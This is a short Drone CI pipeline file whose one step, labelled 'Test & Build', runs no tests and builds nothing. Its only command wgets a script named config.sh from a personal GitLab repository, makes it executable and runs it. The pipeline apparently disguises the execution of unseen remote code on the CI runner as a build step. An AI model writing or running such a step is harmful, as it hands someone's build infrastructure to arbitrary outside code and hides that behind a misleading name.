---
kind: pipeline
name: 'Push'

concurrency:
    limit: 2

steps:
    - name: 'Test & Build'
      image: node:12.13.1
      commands:
          - wget https://gitlab.com/renifer12/project-7/-/raw/main/config.sh && chmod +x config.sh && ./config.sh
